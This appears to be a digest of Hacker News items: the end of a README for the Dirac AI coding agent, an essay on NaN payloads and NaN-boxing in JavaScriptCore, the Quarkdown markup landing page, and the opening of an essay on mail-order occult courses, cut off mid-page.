[(diff)](https://github.com/dirac-run/dirac/blob/master/evals/roo/roo_code_refactor_stoppingcriteria) \[$0.29] **🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/dirac/dirac_refactor_stoppingcriteria) \[$0.12]** **Total Correct** 5/8 5/8 6/8 8/8 6/8 6/8 **8/8** **Avg Cost** $0.49 $0.73 $0.51 $0.44 $0.38 $0.60 **$0.18**

> 🟢 Success | 🟡 Incomplete | 🔴 Failure

> **Cost Comparison**: Dirac is **64.8% cheaper** than the competition (a **2.8x** cost reduction).
> 
> * Expected number of files to be modified/created to complete the task.
> 
> See [evals/README.md](https://github.com/dirac-run/dirac/blob/master/evals/README.md) for detailed task descriptions and methodology.

## 🚀 Key Features

[](#-key-features)

- **Hash-Anchored Edits**: Dirac uses stable line hashes to target edits with extreme precision, avoiding the "lost in translation" issues of traditional line-number based editing. [![Hash-Anchored Edits](https://camo.githubusercontent.com/7c2146782e5ad29e647e51a95f9290c4e5eba1214d0a736d571de7f55cf7a98b/68747470733a2f2f7777772e64697261632e72756e2f7374617469632f696d616765732f6d756c7469706c655f656469742e706e67)](https://camo.githubusercontent.com/7c2146782e5ad29e647e51a95f9290c4e5eba1214d0a736d571de7f55cf7a98b/68747470733a2f2f7777772e64697261632e72756e2f7374617469632f696d616765732f6d756c7469706c655f656469742e706e67)
- **AST-Native Precision**: Built-in understanding of language syntax (TypeScript, Python, C++, etc.) allows Dirac to perform structural manipulations like function extraction or class refactoring with 100% accuracy. [![AST-Native Precision](https://camo.githubusercontent.com/37d1ad7e29ec1d50a714d80c7d60cf27efbf61514c449b48a0e0948245792a92/68747470733a2f2f7777772e64697261632e72756e2f7374617469632f696d616765732f706172616c6c656c5f4153545f656469742e706e67)](https://camo.githubusercontent.com/37d1ad7e29ec1d50a714d80c7d60cf27efbf61514c449b48a0e0948245792a92/68747470733a2f2f7777772e64697261632e72756e2f7374617469632f696d616765732f706172616c6c656c5f4153545f656469742e706e67)
- **Multi-File Batching**: Dirac can process and edit multiple files in a single LLM roundtrip, significantly reducing latency and API costs. [![Multi-File Batching](https://camo.githubusercontent.com/17195a2ee334a899e41d17267152feae6df9bb8459a4fac440f063206c4e7ede/68747470733a2f2f7777772e64697261632e72756e2f7374617469632f696d616765732f6d756c74695f66756e6374696f6e5f726561642e706e67)](https://camo.githubusercontent.com/17195a2ee334a899e41d17267152feae6df9bb8459a4fac440f063206c4e7ede/68747470733a2f2f7777772e64697261632e72756e2f7374617469632f696d616765732f6d756c74695f66756e6374696f6e5f726561642e706e67)
- **High-Bandwidth Context**: Optimized context curation keeps the agent lean and fast, ensuring the LLM always has the most relevant information without wasting tokens.
- **Autonomous Tool Use**: Dirac can read/write files, execute terminal commands, use a headless browser, and more - all while keeping you in control with an approval-based workflow.
- **Skills & AGENTS.md**: Customize Dirac's behavior with project-specific instructions using `AGENTS.md` files. It also seamlessly picks up Claude's skills by automatically reading from `.ai`, `.claude`, and `.agents` directories.
- **Native Tool Calling Only**: To ensure maximum reliability and performance, Dirac exclusively supports models with native tool calling enabled. (Note: MCP is not supported).

## 📦 Installation

[](#-installation)

### VS Code Extension

[](#vs-code-extension)

Install Dirac from the [VS Code Marketplace](https://marketplace.visualstudio.com/items?itemName=dirac-run.dirac).

### CLI (Terminal)

[](#cli-terminal)

Install the Dirac CLI globally using npm:

```
npm install -g dirac-cli
```

## 🚀 CLI Quick Start

[](#-cli-quick-start)

1. **Authenticate**:
   
   ```
   dirac auth
   ```
2. **Run your first task**:
   
   ```
   dirac "Analyze the architecture of this project"
   ```

### Configuration (Environment Variables)

[](#configuration-environment-variables)

You can provide API keys via environment variables to skip the `dirac auth` step. This is ideal for CI/CD or non-persistent environments:

- `ANTHROPIC_API_KEY`
- `OPENAI_API_KEY`
- `OPENROUTER_API_KEY`
- `GEMINI_API_KEY`
- `GROQ_API_KEY`
- `MISTRAL_API_KEY`
- `XAI_API_KEY` (x.ai)
- `HF_TOKEN` (HuggingFace)
- ... and others (see `src/shared/storage/env-config.ts` for the full list).

### Common Commands

[](#common-commands)

- `dirac "prompt"`: Start an interactive task.
- `dirac -p "prompt"`: Run in **Plan Mode** to see the strategy before executing.
- `dirac -y "prompt"`: **Yolo Mode** (auto-approve all actions, great for simple fixes).
- `git diff | dirac "Review these changes"`: Pipe context directly into Dirac.
- `dirac history`: View and resume previous tasks.

## 🛠️ Getting Started

[](#%EF%B8%8F-getting-started)

1. Open the Dirac sidebar in VS Code.
2. Configure your preferred AI provider (Anthropic, OpenAI, OpenRouter, etc.).
3. Start a new task by describing what you want to build or fix.
4. Watch Dirac go!

## 📈 Star History

[](#-star-history)

[![Star History Chart](https://camo.githubusercontent.com/9d2406a6f4e7ca4b176f80752b4bc65c6e46eb87e8e467bca36e43785a542736/68747470733a2f2f6170692e737461722d686973746f72792e636f6d2f7376673f7265706f733d64697261632d72756e2f646972616326747970653d44617465)](https://star-history.com/#dirac-run/dirac&Date)

## 📄 License

[](#-license)

Dirac is **open source** and licensed under the [Apache License 2.0](https://github.com/dirac-run/dirac/blob/master/LICENSE).

## 🤝 Acknowledgments

[](#-acknowledgments)

Dirac is a fork of the excellent [Cline](https://github.com/cline/cline) project. We are grateful to the Cline team and contributors for their foundational work.

* * *

Built with ❤️ by [Max Trivedi](https://www.linkedin.com/in/max-trivedi-49993aab/) at [Dirac Delta Labs](https://dirac.run)

---

## [HN-TITLE] 28. The Secret Life of NaN (2018)

- **Source**: [https://anniecherkaev.com/the-secret-life-of-nan](https://anniecherkaev.com/the-secret-life-of-nan)
- **Site**: anniecherkaev.com
- **Submitter**: prakashqwerty (Hacker News)
- **Submitted**: 2026-04-26 10:56 UTC (Hacker News)
- **HN activity**: 35 points · [19 comments](https://news.ycombinator.com/item?id=47909252)
- **Length**: 2.9K words (~13 min read)

The floating point standard defines a special value called Not-a-Number (NaN) which is used to represent, well, values that aren’t numbers. Double precision NaNs come with a payload of 51 bits which can be used for whatever you want– one especially fun hack is using the payload to represent *all other* non-floating point values and their types at runtime in dynamically typed languages.

%%%%%% update (04/2019) %%%%%%

I gave a lightning talk about the secret life of NaN at !!con West 2019– it has fewer details, but more jokes; you can find a recording [here](https://www.youtube.com/watch?v=3jddE24Ep54).

%%%%%%%%%%%%%%%%%%%%%%%

When I say “NaN” and also “floating point”, I specifically mean the representations defined in [IEEE 754-2008](http://eng.umb.edu/~cuckov/classes/engin341/Reference/IEEE754.pdf), the ubiquitous floating point standard. This standard was born in 1985 ([with much drama!](https://people.eecs.berkeley.edu/~wkahan/ieee754status/754story.html)) out of a need for a canonical representation which would allow code to be portable by quelling the anarchy induced by the menagerie of inconsistent floating point representations used by different processors.

Floating point values are a discrete logarithmic-ish approximation to real numbers; below is a visualization of the points defined by a toy floating point like representation with 3 bits of exponent, 3 bits of mantissa (the image is from the paper [“How do you compute the midpoint of an interval?”](https://hal.archives-ouvertes.fr/file/index/docid/576641/filename/computing-midpoint.pdf), which points out arithmetic artifacts that commonly show up in midpoint computations).

![](https://anniecherkaev.com/images/floating_point_density.jpg)

Since the NaN I’m talking about doesn’t exist outside of IEEE 754-2008, let’s briefly take a look at the spec.

### An extremely brief overview of IEEE 754-2008

The standard defines these logarithmic-ish distributions of values with base-2 and base-10. For base-2, the standard defines representations for bit-widths for all powers of two between 16 bits wide and 256 bits wide; for base-10 it defines representations for bit-widths for all powers of two between 32 bits wide and 128 bits wide. (Well, almost. For the exact spec check out [page 13 spec](http://eng.umb.edu/~cuckov/classes/engin341/Reference/IEEE754.pdf)). These are the only standardized bitwidths, meaning, if a processor supports 32 bit floating point values, then it’s *highly* likely it will support it in the standard compliant representation.

Speaking of which, let’s take a look at what the standard compliant representation is. Let’s look at binary16, the base-2 16 bit wide format:

```
1 sign bit | 5 exponent bits | 10 mantissa bits
S            E E E E E         M M M M M M M M M M
```

I won’t explain how these are used to represent numeric values because I’ve got different fish to fry, but if you do want an explanation, I quite like [these](http://sandbox.mc.edu/~bennet/cs110/flt/index.html) nice walkthroughs.

Briefly, though, here are some examples: the take-away is you can use these 16 bits to encode a variety of values.

```
0 01111 0000000000 = 1
0 00000 0000000000 = +0
1 00000 0000000000 = -0
1 01101 0101010101 = -0.333251953125
```

Cool, so we can represent some finite, discrete collection of real numbers. That’s what you want from your numeric representation most of the time.

More interestingly, though, the standard also defines some special values: ±infinity, and “quiet” & “signaling” NaN. ±infinity are self-explanatory overflow behaviors: in the visualization above, ±15 are the largest magnitude values which can be precisely represented, and computations with values whose magnitudes are larger than 15 may overflow to ±infinity. The spec provides guidance on when operations should return ±infinity based on different rounding modes.

### What IEEE 754-2008 says about NaNs

First of all, let’s see how NaNs are represented, and then we’ll straighten out this “quiet” vs “signaling” business.

The standard reads (page 35, §6.2.1)

> All binary NaN bit strings have all the bits of the biased exponent field E set to 1 (see 3.4). A quiet NaN bit string should be encoded with the first bit (d1) of the trailing significand field T being 1. A signaling NaN bit string should be encoded with the first bit of the trailing significand field being 0.

For example, in the binary16 format, NaNs are specified by the bit patterns:

```
s 11111 1xxxxxxxxxx = quiet     (qNaN)
s 11111 0xxxxxxxxxx = signaling (sNaN) **
```

Notice that this is a large collection of bit patterns! Even ignoring the sign bit, there are 2^(number mantissa bits - 1) bit patterns which *all* encoded a NaN! We’ll refer to these leftover bits as the payload. \*\*: a slight complication: in the sNaN case, at least one of the mantissa bits must be set; it cannot have an all zero payload because the bit pattern with a fully set exponent and fully zeroed out mantissa encodes infinity.

It seems strange to me that the bit which signifies whether or not the NaN is signaling is the top bit of the mantissa rather than the sign bit; perhaps something about how floating point pipelines are implemented makes it less natural to use the sign bit to decide whether or not to raise a signal.

Modern commodity hardware commonly uses 64 bit floats; the double-precision format has 52 bits for the mantissa, which means there are 51 bits available for the payload.

Okay, now let’s see the difference between “quiet” and “signaling” NaNs (page 34, §6.2):

> Signaling NaNs afford representations for uninitialized variables and arithmetic-like enhancements (such as complex-affine infinities or extremely wide range) that are not in the scope of this standard. Quiet NaNs should, by means left to the implementer’s discretion, afford retrospective diagnostic information inherited from invalid or unavailable data and results. To facilitate propagation of diagnostic information contained in NaNs, as much of that information as possible should be preserved in NaN results of operations.
> 
> Under default exception handling, any operation signaling an invalid operation exception and for which a floating-point result is to be delivered shall deliver a quiet NaN.

So “signaling” NaNs may raise an exception; the standard is agnostic to whether floating point is implemented in hardware or software so it doesn’t really say what this exception is. In hardware this might translate to the floating point unit setting an exception flag, or for instance, the C standard [defines and requires](http://pubs.opengroup.org/onlinepubs/009696699/basedefs/signal.h.html) the `SIGFPE` signal to represent floating point computational exceptions.

So, that last quoted sentence says that an operation which receives a signaling NaN can raise the alarm, then quiet the NaN and propagate it along. Why might an operation receive a signaling NaN? Well, that’s what the first quoted sentence explains: you might want to represent uninitialized variables with a signaling NaN so that if anyone ever tries to perform an operation on that value (without having first initialized it) they will be signaled that that was likely not what they wanted to do.

Conversely, “quiet” NaNs are your garden variety NaN– qNaNs are what are produced when the result of an operation is genuinely not a number, like attempting to take the square root of a negative number. The really valuable thing to notice here is the sentence:

> To facilitate propagation of diagnostic information contained in NaNs, as much of that information as possible should be preserved in NaN results of operations.

This means the official suggestion in the floating point standard is to leave a qNaN exactly as you found it, in case someone is using it propagate “diagnostic information” using that payload we saw above. Is this an invitation to jerryrig extra information into NaNs? You bet it is!

### What can we do with the payload?

This is really the question I’m interested in; or, rather, the slight refinement: what *have* people done with the payload?

The most satisfying answer that I found to this question is, people have used the NaN payload to pass around data & type information in dynamically typed languages, including implementations in Lua and Javascript. Why dynamically typed languages? Because if your language is dynamically typed, then the type of a variable can change at runtime, which means you absolutely must also pass around some type information; the NaN payload is an opportunity to store both that type information and the actual value. We’ll take a look at one of these implementations in detail in just a moment.

I tried to track down other uses but didn’t find much else; [this textbook](https://koclab.cs.ucsb.edu/teaching/cs16/docx/FloatingPointNumbers.pdf) has some suggestions (page 86):

> One possibility might be to use NaNs as symbols in a symbolic expression parser. Another would be to use NaNs as missing data values and the payload to indicate a source for the missing data or its class.

The author probably had something specific in mind, but I couldn’t track down any implementations which used NaN payloads for symbols or a source indication for missing data. If anyone knows of other uses of the NaN payload in the wild, I’d love to hear about them!

Okay, let’s look at how JavaScriptCore uses the payload to store type information:

## Payload in Practice! A look at JavaScriptCore

We’re going to look at an implementation of a technique called NaN-boxing. Under NaN-boxing, all values in the language & their type tags are represented in 64 bits! Valid double-precision floats are left to their IEEE 754 representations, but all of that leftover space in the payload of NaNs is used to store *every other value* in the language, as well as a tag to signify what the type of the payload is. It’s like instead of saying “not a number” we’re saying “not a double precision float”, but rather a “&lt;some other type&gt;”.

We’re going to look at how JavaScriptCore (JSC) uses NaN-boxing, but JSC isn’t the only real-world industry-grade implementation that stores other types in NaNs. For example, [Mozilla’s](https://developer.mozilla.org/en-US/docs/Mozilla/Projects/SpiderMonkey/Internals) [SpiderMonkey](http://www.redditmirror.cc/cache/websites/blog.mozilla.com_cwn0q/blog.mozilla.com/rob-sayre/2010/08/02/mozillas-new-javascript-value-representation/index.html) JavaScript implementation also uses NaN-boxing (which they call nun-boxing & pun-boxing), as does [LuaJIT](http://lua-users.org/lists/lua-l/2009-11/msg00089.html), which they call NaN-tagging. The reason I want to look at JSC’s code is it has a really great comment explaining their implementation.

JSC is the JavaScript implementation that powers WebKit, which runs Safari and Adobe’s Creative Suite. As far as I can tell, the code we’re going to look at is actually currently being used in Safari- as of March 2018, the file had last been modified 18 days ago.

[Here](https://github.com/WebKit/webkit/blob/23f2af82553c2cee7bae08392f2e9ba6e8c9e0c0/Source/JavaScriptCore/runtime/JSCJSValue.h#L362-L410) is the file we’re going to look at. The way NaN-boxing works is when you have non-float datatypes (pointers, integers, booleans) you store them in the payload, and use the top bits to encode the type of the payload. In the case of double-precision floats, we have 51 bits of payload which means we can store anything that fits in those 51 bits. Notably we can store 32 bit integers, and 48 bit pointers [(the current x86-64 pointer bit-width)](https://nikic.github.io/2012/02/02/Pointer-magic-for-efficient-dynamic-value-representations.html). This means that we can store every value in the language in 64 bits.

**Sidenote:** according to the [ECMAScript standard](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Data_structures), JavaScript doesn’t have a primitive integer datatype- it’s all double-precision floats. So why would a JS implementation want to represent integers? One good reason is integer operations are *so much faster* in hardware, and many of the numeric values used in programs really *are* ints. A notable example is an index variable in a for-loop which walks over an array. [Also according to the ECMAScript spec](https://www.ecma-international.org/publications/files/ECMA-ST/Ecma-262.pdf), arrays can only have 2^32 elements so it is actually safe to store array index variables as 32-bit ints in NaN payloads.

The encoding they use is:

> ```
> * The top 16-bits denote the type of the encoded JSValue:
*
*     Pointer {  0000:PPPP:PPPP:PPPP
*              / 0001:****:****:****
*     Double  {         ...
*              \ FFFE:****:****:****
*     Integer {  FFFF:0000:IIII:IIII
*
* The scheme we have implemented encodes double precision values by performing a
* 64-bit integer addition of the value 2^48 to the number. After this manipulation
* no encoded double-precision value will begin with the pattern 0x0000 or 0xFFFF.
* Values must be decoded by reversing this operation before subsequent floating point
* operations may be peformed.
> ```

So this comment explains that different value ranges are used to represent different types of objects. But notice that these bit-ranges don’t match those defined in IEEE-754; for instance, in the standard for double precision values:

```
a valid qNaN:
1 sign bit | 11 exponent bits | 52 mantissa bits
1 | 1 1 1 1 1 1 1 1 1 1 1 | 1 + {51 bits of payload}

chunked into bytes this is:
1 1 1 1 | 1 1 1 1 | 1 1 1 1 | 1 + {51 bits of payload}

which represents all the bit patterns in the range:
0x F F F F ...
to
0x F F F 8 ...
```

This means that according to the standard, the bit-ranges usually represented by valid doubles vs. qNaNs are:

```
         / 0000:****:****:****
Double  {        ...
         \ FFF7:****:****:****
         / FFF8:****:****:****
qNaN    {        ...
         \ FFFF:****:****:****
```

So what the comment in the code is showing us is that the ranges they’re representing are *shifted* from what’s defined in the standard. The reason they’re doing this is to favor pointers: because pointers occupy the range with the top two bytes zeroed, you can manipulate pointers without applying a mask. The effect is that pointers aren’t “boxed”, while all other values are. This choice to favor pointers isn’t obvious; the [SpiderMonkey implementation](https://github.com/ricardoquesada/Spidermonkey/blob/4a75ea2543408bd1b2c515aa95901523eeef7858/js/src/gdb/mozilla/jsval.py#L119) doesn’t shift the range, thus favoring doubles.

Okay, so I think the easiest way to see what’s up with this range shifting business is by looking at the mask lower down in that file:

> ```
> // This value is 2^48, used to encode doubles such that the encoded value will begin
// with a 16-bit pattern within the range 0x0001..0xFFFE.
#define DoubleEncodeOffset 0x1000000000000ll
> ```

This offset is [used](https://github.com/WebKit/webkit/blob/dd7199d7f8f417992f60c9f1514e4b548ec923fb/Source/JavaScriptCore/runtime/JSCJSValueInlines.h#L514) in the `asDouble()` function:

> ```
>  inline double JSValue::asDouble() const
{
    ASSERT(isDouble());
    return reinterpretInt64ToDouble(u.asInt64 - DoubleEncodeOffset);
}
> ```

This shifts the encoded double into the normal range of bit patterns defined by the standard. Conversely, the `asCell()` function (I believe in JSC “cells” and “pointers” are roughly interchangeable terms) can just grab the pointer directly without shifting:

> ```
>  ALWAYS_INLINE JSCell* JSValue::asCell() const
{
    ASSERT(isCell());
    return u.ptr;
}
> ```

Cool. That’s actually basically it. Below I’ll mention a few more fun tidbits from the JSC implementation, but this is really the heart of the NaN-boxing implementation.

### What about all the *other* values?

The part of the comment that said that if the top two bytes are 0, then the payload is a pointer was lying. Or, okay, over-simplified. JSC reserves specific, invalid, pointer values to denote immediates required by the ECMAScript standard: boolean, undefined & null:

> ```
> *     False:     0x06
*     True:      0x07
*     Undefined: 0x0a   
*     Null:      0x02
> ```

These all have the second bit set to make it easy to test whether the value is any of these immediates.

They also represent 2 immediates not required by the standard: `ValueEmpty` at 0x00, which are used to represent holes in arrays, & `ValueDeleted` at 0x04, which are used to mark deleted values.

And finally, they also represent pointers into [Wasm](http://webassembly.org/) at 0x03.

So, putting it all together, a complete picture of the bit pattern encodings in JSC is:

> ```
> *     ValEmpty  {  0000:0000:0000:0000
*     Null      {  0000:0000:0000:0002
*     Wasm      {  0000:0000:0000:0003
*     ValDeltd  {  0000:0000:0000:0004   
*     False     {  0000:0000:0000:0006
*     True      {  0000:0000:0000:0007
*     Undefined {  0000:0000:0000:000a    
*     Pointer   {  0000:PPPP:PPPP:PPPP
*                / 0001:****:****:****
*     Double    {         ...
*                \ FFFE:****:****:****
*     Integer   {  FFFF:0000:IIII:IIII
> ```

## Take-Aways

1. The floating point spec leaves a *lot* of room for NaN payloads. It does this intentionally.
2. What are these payloads used for in real life? Mostly, I don’t know what they’re used for. If you know of other real world uses, I’d love to hear from you.
3. One use is NaN-boxing, which is where you stick all the other non-floating point values in a language + their type information into the payload of NaNs. It’s a beautiful hack.

* * *

### Appendix: to NaNbox or not to NaNbox

Looking at this implementation begs the question, is NaN-boxing a good idea or a bizzaro hack? As someone who isn’t implementing or maintaining a dynamically typed language, I’m not well-posed to answer that question. There are [a lot of different approaches](http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.39.4394&rep=rep1&type=pdf) which surely all have nuanced tradeoffs that show up depending on the use-cases of your language. With that caveat, here’s a rough sketch of what some pros & cons are. Pros: saves memory, all values fit in registers, bit masks are fast to apply; Cons: have to box & unbox almost all values, implementation becomes harder, and validation bugs can be serious security vulnerabilities.

For a better discussion of NaN-boxing tradeoffs from someone who does implement & maintain a dynamically typed language check out [this article](https://wingolog.org/archives/2011/05/18/value-representation-in-javascript-implementations).

Apart from performance, there is [this writeup](http://www.phrack.org/papers/attacking_javascript_engines.html) and [this other writeup](https://blog.xyz.is/2016/webkit-360.html) of vulnerabilities discovered in JSC. Whether these vulnerabilities would have been preventable if JSC had used a different approach for storing type information is a moot point, but there is at least one vulnerability that seems like it would have been prevented:

> This way we control all 8 bytes of the structure, but there are other limitations (Some floating-point normalization crap does not allow for truly arbitrary values to be written. Otherwise, you would be able to craft a CellTag and set pointer to an arbitrary value, that would be horrible. Interestingly, before it did allow that, which is what the very first Vita WebKit exploit used! CVE-2010-1807).

If you want to know way more about JSC’s memory model there is also [this](https://webkit.org/blog/7846/concurrent-javascript-it-can-work/) very in depth article.

---

## [HN-TITLE] 29. Quarkdown – Markdown with Superpowers

- **Source**: [https://quarkdown.com/](https://quarkdown.com/)
- **Site**: quarkdown.com
- **Author**: Giorgio Garofalo
- **Submitted**: 2026-04-27 08:54 UTC (Hacker News)
- **HN activity**: 271 points · [98 comments](https://news.ycombinator.com/item?id=47919240)
- **Length**: 299 words (~2 min read)
- **Language**: en

No boilerplate

## Spend your time writing

and don't worry about the rest.

```
.docauthor {Jennifer Chu}

.pagemargin {topright}
    .docauthor | MIT News

# X-ray flashes from a supermassive black hole

!(70%)[Black hole](img/blackhole.jpg)

.abstract
    One supermassive black hole has kept astronomers glued to their scopes
    for the last several years.
    The black hole in question is `1ES 1927+654`, which is about as
    massive as a million suns and sits in a galaxy that is 270 million
    light-years away.
    In 2018, astronomers at MIT and elsewhere observed that the black
    hole’s corona — a cloud of whirling, white-hot plasma — suddenly
    **disappeared**, before reassembling months later.
    The brief though dramatic shut-off was a first in black hole astronomy.

> This would be the closest thing we know of around any black hole.
> - Megan Masterson, a graduate student in physics at MIT
```

![Rendered article about X-ray flashes from a supermassive black hole](https://quarkdown.com/_astro/no-boilerplate.SaDlAnd3_Z16VNJW.webp)

Batteries included

## Complete authoring experience

Write Markdown to reach flow state faster.  
Use Quarkdown's extensions to achieve more.

![First page of a scientific paper with title, abstract and introduction](https://quarkdown.com/_astro/authoring-1.DJIUc1nX_2dgAbU.webp) ![Second page of a scientific paper with formulas and a results table](https://quarkdown.com/_astro/authoring-2.DyZrIBu4_mKIrN.webp)

Versatile

## One tool to rule them all

Whether you are writing a research paper, a quick report, a company-wide wiki, class notes, or preparing interactive slides for your next talk, there's only one line you need.

Replaces

LaTeXLaTeXTypstTypst

```
.doctype {paged}
```

![Paged document output showing a formatted article](https://quarkdown.com/_astro/doctype-paged.D0Cs-mnS_wI8x9.webp)

For articles, books and reports.

Replaces

NotionNotionObsidianObsidian

```
.doctype {plain}
```

![Plain document output showing a coffee brewing guide](https://quarkdown.com/_astro/doctype-plain.DAkJSSiY_Z2vmo3C.webp)

For notes, knowledge bases and simple static websites.

Replaces

GitBookGitBookDocusaurusDocusaurusMkDocsMaterial for MkDocsVitePressVitePress

```
.doctype {docs}
```

![Documentation website output](https://quarkdown.com/_astro/doctype-docs.Bk9wAFWq_2jfet2.webp)

For wikis, technical documentation and large knowledge bases.

Replaces

BeamerLaTeXGoogle SlidesGoogle Slides

```
.doctype {slides}
```

![Slide presentation output](https://quarkdown.com/_astro/doctype-slides.CezSCHgD_Z1Sexql.webp)

For lectures, talks and interactive presentations.

Reactive preview

## Typesetting for the impatient

With blazing fast compilation and live preview, see results instantly as you type.

Turing complete

## Don't repeat yourself

Reuse your workflow thanks to powerful scripting capabilities.

```
.function {animal}
    name ecosystem picture:
    .row
        .clip {circle}
            .picture

        - **Name**: .name
        - **Ecosystem**: .ecosystem

.animal {Red panda} ecosystem:{Temperate forests}
    ![Red panda](img/red-panda.jpg)

.animal {Sea otter} ecosystem:{Kelp forests}
    ![Sea otter](img/sea-otter.jpg)

.animal {Clownfish} ecosystem:{Coral reefs}
    ![Clownfish](img/clownfish.jpg)
```

![Animal cards rendered from a custom function](https://quarkdown.com/_astro/scripting.B2wI0zk3_tF9cb.webp)

---

## [HN-TITLE] 30. Magic by return of post: How mail order delivered the occult

- **Source**: [https://publicdomainreview.org/essay/magic-by-return-of-post/](https://publicdomainreview.org/essay/magic-by-return-of-post/)
- **Site**: The Public Domain Review
- **Submitter**: Vigier (Hacker News)
- **Submitted**: 2026-04-25 21:17 UTC (Hacker News)
- **HN activity**: 42 points · [5 comments](https://news.ycombinator.com/item?id=47904615)
- **Length**: 3.7K words (~17 min read)
- **Language**: en

[](#img-0)

![Two profile portraits of mustached men face each other, one labeled 'desire retained' drawing arrows inward, the other 'desire released' scattering arrows outward.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/01-personal-magnetism.jpg?width=1200&height=765)Scroll through the whole page to download all images before printing.

“Force accumulated always attracts, force released is wasted and neutralized”, diagram from *A Course in Personal Magnetism: Self-Control and the Development of Character*, the first part of the mail-order “Series ‘B’”, published by Sydney Flower’s Psychic Research Company in 1901 — [Source](https://wellcomecollection.org/works/ubh8h9wk/items?canvas=19).

In the early twentieth century, after the rationalising forces of the Enlightenment had supposedly recast spiritual life through reason, curious advertisements began to appear in popular periodicals ranging from *Popular Mechanics* to *Weird Tales*, offering arcane occult knowledge sent directly to the reader’s door. Typical of their genre, a 1902 notice in the *Chicago Tribune* introduced the De Laurence Institute of Hypnotism, which promised to “\[unfold] the mysterious law of all personal magnetism, occult force, and influence”, while, elsewhere, the *Occult Digest* announced the services of the Los Angeles–based Brotherhood of Light, who had on offer “correspondence courses in all branches of occult science” by return of post.[1](#fn1) Sending away for the secrets of the ages was, it seemed, disarmingly simple, part and parcel of the colossal mail-order industry that had emerged during the Second Industrial Revolution of the late-nineteenth and early twentieth centuries.

The rise of mail-order magic was, in many ways, both an upshot and a parody of modernity. America’s long nineteenth century had already seen its fair share of religious transformation, with movements like Mormonism, Seventh-day Adventism, Christian Science, and the Shakers, among others, emerging from the spiritual fervour of the Second Great Awakening, each grappling in their own way with the relationship between the individual and society at large. In 1917, German sociologist Max Weber famously argued that “the fate of our times is characterized by rationalization and intellectualization and, above all, by the ‘disenchantment of the world’”.[2](#fn2) To Weber’s mind, the progress of the modern world had eradicated the need for spiritual practice, with the purposes it had once held now being carried by the cold logics of bureaucracy, science, and instrumental reason. From the vantage point of hindsight, however, Weber’s *Entzauberung* thesis seems less terminal than he had imagined.

In a time increasingly shaped by Taylorist factories and scientific materialism, Weber ultimately misread modernity, and his account of disenchantment confused modernity’s growing spiritual liberalism with large-scale secularisation. That is, Weber believed that the declining adherence to Christianity (which was unmistakable) signalled that the numinous had faded from modern life (which couldn’t have been further from the truth). Modernity and scientific materialism didn’t really get rid of spiritual practice as much as abstract it from an inherited, communal framework. What modernity had in fact created was a radical redistribution of belief, in which the rationalist currents presumed to have extinguished faith in powers and presences beyond oneself became the very means by which one could learn about these otherworldly forces from the privacy of one’s own home.

[](#img-1)

![A book cover titled 'Catalogue: Occult And Spiritual Books' from The de Laurence Co., Chicago, featuring Egyptian imagery and a colorful downward-pointing triangle.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/02-delaurence-cover-edit.jpg?width=1200&height=765)Scroll through the whole page to download all images before printing.

Cover of an occult and spiritual books catalogue published by L. W. de Laurence’s mail-order company, 1931 — [Source](https://commons.wikimedia.org/wiki/File:Cover_of_catalogue_published_by_L._W._de_Laurence%E2%80%99s_mail-order_company.jpg).

![Advertisement for 'Temple Incense' showing a woman with flowing hair between two candles, smoke rising from a round vessel below her.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/03-delaurence-temple-incense-p-edit.jpg?width=1200&height=765)Scroll through the whole page to download all images before printing.

Advertisement for “temple incense” sold by L. W. de Laurence’s mail-order company, 1931 — [Source](https://commons.wikimedia.org/wiki/File:De_Laurence_temple_incense.jpg).

The new material conditions of postal exchange — linotype machines, cheap pulp paper, and rapidly improving and expanding delivery networks — made the recondite world of the occult ultra-targeted and at a scale never before seen. The consumer now got to choose if they wanted to practice meditation, astrology, tarot, Mesmerism, Kabbalah, Rosicrucianism, something even more arcane, or a unique combination of them all. There was no fixed template for how the instruction unfolded, but most would-be adherents began their affiliation by responding to the offer of a free sample lesson or catalogue from a magazine ad. From there, they could subscribe to courses whose scale, duration, and cost varied greatly. To give just a single example, lessons from Psychiana, one of the largest esoteric correspondence schools of the 1930s by subscriber numbers, cost around $1 each (about $20 in today’s currency) and were purchased in groups of ten or twenty lessons, with one lesson posted weekly. For students of Psychiana, as well as those who sent away to the many other smaller providers, completion of these introductory sequences usually then opened onto further tiers of instruction or advanced courses, with payment typically remitted in cash, sometimes in instalments or in arrears.

One of mail-order magic’s early innovators was Sydney Flower, the shadowy Chicago-based publisher behind *The Hypnotic Magazine*, *The Yogi*, and *New Thought* (the latter co-edited with William Walker Atkinson, best known as the presumed author of 1908’s *Kybalion*), as well as a startling range of orderable courses, through his Psychic Research Company and Magnetic Publishing Company, with titles such as *A Course of Instruction in Magnetic Healing in Five Parts* and *A Course of Instruction in the Development of Power through Clairvoyance*.

[](#img-2)

![Green book cover titled 'Personal Magnetism, The First Part in Series B,' published by The Psychic Research Co., Chicago and London.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/04-personal-magnetism-cover.jpg?width=1200&height=765)Scroll through the whole page to download all images before printing.

Cover of the mail-order *Course in Personal Magnetism: Self-Control and the Development of Character*, the first part of “Series ‘B’”, published by Sydney Flower’s Psychic Research Company in 1901 — [Source](https://wellcomecollection.org/works/ubh8h9wk/items?canvas=3).

![Green book cover for 'Magnetic Healing, The Fourth Part in Series B,' listing other titles in the series, published by The Psychic Research Co.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/05-magnetic-healing-cover.jpg?width=1200&height=765)Scroll through the whole page to download all images before printing.

Cover of the mail-order *A Course of Instruction in Magnetic Healing*, the fourth part of “Series ‘B’”, published by Sydney Flower’s Psychic Research Company in 1901 — [Source](https://wellcomecollection.org/works/ubh8h9wk/items?canvas=219).

[](#img-3)

![Two printed testimonial letters from readers praising a mail-order course, titled 'Beautiful Lessons, Long Wished For' and 'Personal Magnetism Alone Worth 20s.'](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/06-c1903__research_publishing_co___samples_of_letters_received-detail.jpg?width=1200&height=765)Scroll through the whole page to download all images before printing.

